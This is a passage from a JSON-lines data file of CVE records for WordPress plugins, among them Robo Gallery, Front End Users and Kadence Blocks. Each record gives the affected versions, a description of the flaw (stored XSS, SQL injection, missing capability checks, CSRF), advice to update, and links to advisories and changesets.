version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ab58add-ab81-4c84-b773-7daf382492b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ab58add-ab81-4c84-b773-7daf382492b0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0371","slug":"views-for-wpforms-lite","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Views for WPForms \u2013 Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'create_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9565693-fd0b-4412-944c-81b3cd79492e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9565693-fd0b-4412-944c-81b3cd79492e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0370","slug":"views-for-wpforms-lite","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Views for WPForms \u2013 Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to modify the titles of arbitrary posts.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c4c8113-4c46-4179-9c7f-9d5d4337254d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c4c8113-4c46-4179-9c7f-9d5d4337254d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4149","slug":"chaty","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Floating Chat Widget: Contact Chat Icons, WhatsApp, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button  WordPress plugin before 3.2.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0256ec2a-f1a9-4110-9978-ee88f9e24237\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0256ec2a-f1a9-4110-9978-ee88f9e24237\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5793","slug":"houzez-theme-functionality","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Houzez Theme - Functionality plugin for WordPress is vulnerable to SQL Injection via the \u2018currency_code\u2019 parameter in all versions up to, and including, 3.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Custom-level (seller) access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a9bbe79-a4c3-42eb-8d4d-47d26dbe9f43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a9bbe79-a4c3-42eb-8d4d-47d26dbe9f43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/favethemes.zendesk.com\\\/hc\\\/en-us\\\/articles\\\/360041639432-Changelog\",\"name\":\"https:\\\/\\\/favethemes.zendesk.com\\\/hc\\\/en-us\\\/articles\\\/360041639432-Changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4570","slug":"top-10","versionEndExcluding":"3.2.3","description":"The Top 10 WordPress plugin before 3.2.3 does not validate and escape some of its Block attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2483ecf-42a6-470a-b965-4e05069d1cef\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2483ecf-42a6-470a-b965-4e05069d1cef\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7607","slug":"front-end-only-users","versionImpact":"3.2.28","versionEndExcluding":"3.2.29","description":"The Front End Users plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018order\u2019 parameter in all versions up to, and including, 3.2.28 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.2.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec162cdc-d4cd-47d9-b941-24bfee6c48fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec162cdc-d4cd-47d9-b941-24bfee6c48fd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142978\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142978\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7606","slug":"front-end-only-users","versionImpact":"3.2.28","versionEndExcluding":"3.2.29","description":"The Front End Users plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'user-search' shortcode in all versions up to, and including, 3.2.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/048ea84c-0d53-434b-ae49-d804ec1de8c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/048ea84c-0d53-434b-ae49-d804ec1de8c4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/Shortcodes\\\/Insert_User_Search.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/Shortcodes\\\/Insert_User_Search.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/Shortcodes\\\/Insert_User_Search.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/Shortcodes\\\/Insert_User_Search.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142978\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142978\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1541","slug":"kadence-blocks","versionImpact":"3.2.23","versionEndExcluding":"3.2.24","description":"The Gutenberg Blocks by Kadence Blocks \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the htmlTag attribute in all versions up to, and including, 3.2.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0913632-85c5-4835-b606-4eca51df2496?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0913632-85c5-4835-b606-4eca51df2496?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.2.21\\\/includes\\\/blocks\\\/class-kadence-blocks-advanced-heading-block.php#L418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.2.21\\\/includes\\\/blocks\\\/class-kadence-blocks-advanced-heading-block.php#L418\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041366%40kadence-blocks%2Ftrunk&old=3036979%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041366%40kadence-blocks%2Ftrunk&old=3036979%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13384","slug":"robo-gallery","versionImpact":"3.2.23","versionEndExcluding":"3.2.24","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery WordPress plugin before 3.2.24 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.2.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f65d8a83-6ce8-40be-8633-deffd555c349\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f65d8a83-6ce8-40be-8633-deffd555c349\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10102","slug":"robo-gallery","versionImpact":"3.2.21","versionEndExcluding":"3.2.22","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery WordPress plugin before 3.2.22 does not sanitise and escape some of its Gallery settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 3.2.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b34d1ec-5370-40a8-964e-663f4f9f42f8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b34d1ec-5370-40a8-964e-663f4f9f42f8\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b34d1ec-5370-40a8-964e-663f4f9f42f8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b34d1ec-5370-40a8-964e-663f4f9f42f8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10144","slug":"robo-gallery","versionImpact":"3.2.21","versionEndExcluding":"3.2.22","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery WordPress plugin before 3.2.22 does not sanitise and escape some of its settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.2.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a83521d3-0aba-493d-8dec-e764277e69b8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a83521d3-0aba-493d-8dec-e764277e69b8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12172","slug":"wp-courses","versionImpact":"3.2.21","versionEndExcluding":"3.2.22","description":"The WP Courses LMS \u2013 Online Courses Builder, eLearning Courses, Courses Solution, Education Courses plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wpc_update_user_meta_option() function in all versions up to, and including, 3.2.21. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary user's metadata which can be levereged to block an administrator from accessing their site when wp_capabilities is set to 0.","recommendation":"Update to version 3.2.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203679%40wp-courses&new=3203679%40wp-courses&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203679%40wp-courses&new=3203679%40wp-courses&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/760e999e-cac9-493f-9737-ad0cf055c880?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/760e999e-cac9-493f-9737-ad0cf055c880?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8431","slug":"robo-gallery","versionImpact":"3.2.21","versionEndExcluding":"3.2.22","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajaxGetGalleryJson() function in all versions up to, and including, 3.2.21. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve private post titles.","recommendation":"Update to version 3.2.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/632c0a1a-6ac2-44c3-b66c-44fa4cf05b2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/632c0a1a-6ac2-44c3-b66c-44fa4cf05b2d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.21\\\/includes\\\/extensions\\\/block\\\/src\\\/init.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.21\\\/includes\\\/extensions\\\/block\\\/src\\\/init.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162670\\\/robo-gallery\\\/trunk\\\/includes\\\/extensions\\\/block\\\/src\\\/init.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162670\\\/robo-gallery\\\/trunk\\\/includes\\\/extensions\\\/block\\\/src\\\/init.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3894","slug":"robo-gallery","versionImpact":"3.2.19","versionEndExcluding":"3.2.20","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an Image Title in all versions up to, and including, 3.2.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e75d72d-d999-4755-8c90-7fb7d630ab00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e75d72d-d999-4755-8c90-7fb7d630ab00?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3100759%40robo-gallery%2Ftrunk&old=3066013%40robo-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3100759%40robo-gallery%2Ftrunk&old=3066013%40robo-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5343","slug":"robo-gallery","versionImpact":"3.2.19","versionEndExcluding":"3.2.20","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.19. This is due to missing or incorrect nonce validation on the 'rbs_ajax_create_article' and 'rbs_ajax_reset_views' functions. This makes it possible for unauthenticated attackers to create new posts and reset gallery view counts via a forged request granted they can trick a Contributor+ level user into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/045fbe5b-0e63-4820-97a7-017dd72eb73a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/045fbe5b-0e63-4820-97a7-017dd72eb73a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.19\\\/includes\\\/rbs_gallery_ajax.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.19\\\/includes\\\/rbs_gallery_ajax.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.19\\\/includes\\\/extensions\\\/rbs_create_post_ajax.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.19\\\/includes\\\/extensions\\\/rbs_create_post_ajax.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.19\\\/includes\\\/extensions\\\/rbs_create_post_ajax.php#L247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.19\\\/includes\\\/extensions\\\/rbs_create_post_ajax.php#L247\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100759\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100759\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3896","slug":"robo-gallery","versionImpact":"3.2.19","versionEndExcluding":"3.2.20","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the the Gallery title field in all versions up to, and including, 3.2.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69ab404b-1c2f-441b-8622-3cf830587d95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69ab404b-1c2f-441b-8622-3cf830587d95?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100759\\\/robo-gallery\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100759\\\/robo-gallery\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0377","slug":"scriptless-social-sharing","versionEndExcluding":"3.2.2","description":"The Scriptless Social Sharing WordPress plugin before 3.2.2 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b1aacd1-3f75-4a6f-8146-cbb98a713724\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b1aacd1-3f75-4a6f-8146-cbb98a713724\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1507","slug":"googleanalytics","versionImpact":"3.2.1","versionEndExcluding":"3.2.2","description":"The ShareThis Dashboard for Google Analytics plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handle_actions() function in all versions up to, and including, 3.2.1. This makes it possible for unauthenticated attackers to disable all features.","recommendation":"Update to version 3.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255511\\\/googleanalytics\\\/trunk\\\/class\\\/core\\\/class-ga-controller-core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255511\\\/googleanalytics\\\/trunk\\\/class\\\/core\\\/class-ga-controller-core.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/314b8638-15e7-461d-a705-3858fe6813e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/314b8638-15e7-461d-a705-3858fe6813e7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8536","slug":"ultimate-blocks","versionImpact":"3.2.1","versionEndExcluding":"3.2.2","description":"The Ultimate Blocks  WordPress plugin before 3.2.2 does not validate and escape some of its block attributes before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 3.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/abd5b6c6-f541-4739-882d-2011436f7a8b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/abd5b6c6-f541-4739-882d-2011436f7a8b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3062","slug":"save-as-image-by-pdfcrowd","versionImpact":"3.2.1","versionEndExcluding":"3.2.2","description":"The Save as Image Plugin by Pdfcrowd WordPress plugin before 3.2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1526985d-2f8f-4b2a-97f3-633c51d024b8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1526985d-2f8f-4b2a-97f3-633c51d024b8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12257","slug":"cardgate","versionImpact":"3.2.1","versionEndExcluding":"3.2.2","description":"The CardGate Payments for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203585\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203585\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f8de5a9-2279-4b84-b1f6-fdb293aa6017?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f8de5a9-2279-4b84-b1f6-fdb293aa6017?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4145","slug":"search-and-replace","versionImpact":"3.2.1","versionEndExcluding":"3.2.2","description":"The Search & Replace WordPress plugin before 3.2.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks (such as within a multi-site network).","recommendation":"Update to version 3.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d5b8764-c82d-4969-a707-f38b63bcadca\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d5b8764-c82d-4969-a707-f38b63bcadca\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4633","slug":"depicter","versionImpact":"3.2.1","versionEndExcluding":"3.2.2","description":"The Slider and Carousel slider by Depicter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018addExtraMimeType\u2019 function in versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/tags\\\/2.1.11\\\/app\\\/src\\\/WordPress\\\/SVGServiceProvider.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/tags\\\/2.1.11\\\/app\\\/src\\\/WordPress\\\/SVGServiceProvider.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134888\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134888\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/965cacd3-1786-4e7d-8209-eea293b161d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/965cacd3-1786-4e7d-8209-eea293b161d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
